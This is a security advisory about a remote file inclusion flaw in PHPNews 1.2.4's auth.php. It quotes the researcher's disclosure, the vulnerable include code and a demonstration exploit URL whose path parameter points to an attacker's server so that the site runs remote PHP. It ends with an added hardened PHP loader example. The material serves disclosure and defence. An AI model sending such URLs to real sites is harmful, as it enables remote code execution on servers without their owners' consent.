SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   PHPNews
Vendors:   newsphp.sourceforge.net
PHPNews 'auth.php' Include File Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1013345
SecurityTracker URL:  http://securitytracker.com/id/1013345
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 2 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Version(s): 1.2.4
Description:   An include file vulnerability was reported in PHPNews. A remote user can execute arbitrary commands on the target system.

The 'auth.php' script does not properly validate the user-supplied path variable. A remote user can supply a specially crafted URL to cause the script to include and execute PHP code from a remote location.

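This flaw can be exploited if register_globals and allow_url_fopen are both set to 'on': register_globals lets the 'path' request parameter set the script's $path variable, and allow_url_fopen lets the include fetch a file from a URL.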

A demonstration exploit URL that will execute the 'en_GB.admin.lng' or 'admin.lng' file from the attacker's server is provided:

http://[target]/[dir]/auth.php?path=http://[attacker]/

Filip Groszynski reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system. The code will run with the privileges of the target web service.
Solution:   The vendor has released a fixed version (1.2.5), available at:

http://newsphp.sourceforge.net/downloads.php

Vendor URL:  newsphp.sourceforge.net/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP News <= 1.2.4 - Remote File Inclusion (VXSfx)




-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name:       PHP News
Version:    1.2.4 (and possibly 1.2.3)
Homepage:   http://newsphp.sourceforge.net/

Author:     Filip Groszynski   (VXSfx)
Date:       23 February 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in auth.php:

  if (is_Array($userDetails)) {
    ...
  }
  /* You're about to log in/no user language is specified */
  else if(file_exists($path . 'languages/' . $lang . '.admin.lng')) {
    include_once($path . 'languages/' . $lang . '.admin.lng');
    ....
  } else {
    include_once($path . 'languages/en_GB.admin.lng');
    ....
  }

--------------------------------------------------------

Example:

  if register_globals=on and allow_url_fopen=on:
    http://[victim]/[dir]/auth.php?path=http://[hacker_box]/

--------------------------------------------------------

Fix and Vendor status:

  Vendor has been notified, expect an official patch tomorrow.
  
--------------------------------------------------------

Contact:

    Author:    Filip Groszynski   (VXSfx)
    Location:  Poland <Warsaw>
    Email:     groszynskif <at> gmail <dot> com
    HP:        http://shell.homeunix.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
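
A hardened form of the language-file include quoted in the message above, as an added example that is not PHPNews code and not the vendor's 1.2.5 patch: the base directory is fixed by the application instead of coming from $path, and $lang is restricted to locale-shaped names and checked for containment. The function name, the demo directory and the sample values are assumptions.

```php
<?php
// Added example, not PHPNews code; names are hypothetical.
// Deployment side (php.ini): register_globals = Off, allow_url_fopen = Off.

// $baseDir is fixed by the application and never read from request data;
// $lang is untrusted. Returns the absolute path of the file to include.
function resolve_admin_language(string $baseDir, ?string $lang): string
{
    $langDir = realpath($baseDir . '/languages');
    if ($langDir === false) {
        throw new RuntimeException('languages directory not found');
    }
    // Accept only locale-shaped names such as en_GB; otherwise use the default.
    if ($lang === null || preg_match('/\A[a-z]{2}_[A-Z]{2}\z/', $lang) !== 1) {
        $lang = 'en_GB';
    }
    foreach ([$lang, 'en_GB'] as $name) {
        $file = realpath($langDir . DIRECTORY_SEPARATOR . $name . '.admin.lng');
        // Containment check: the resolved file must sit directly in $langDir.
        if ($file !== false && dirname($file) === $langDir && is_file($file)) {
            return $file;
        }
    }
    throw new RuntimeException('no usable language file');
}

// Constructed demo tree standing in for the PHPNews install directory.
$base = sys_get_temp_dir() . '/phpnews_demo_' . getmypid();
if (!is_dir($base . '/languages')) {
    mkdir($base . '/languages', 0700, true);
}
file_put_contents($base . '/languages/en_GB.admin.lng', "<?php // default strings\n");
file_put_contents($base . '/languages/pl_PL.admin.lng', "<?php // Polish strings\n");

// Constructed untrusted values; the URL-shaped one mirrors the advisory's case.
foreach (['pl_PL', 'xx_YY', 'http://attacker.invalid/', null] as $lang) {
    $file = resolve_admin_language($base, $lang);
    printf("%-28s -> %s\n", var_export($lang, true), basename($file));
    include_once $file; // always a local file under $base/languages
}
```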

 
 

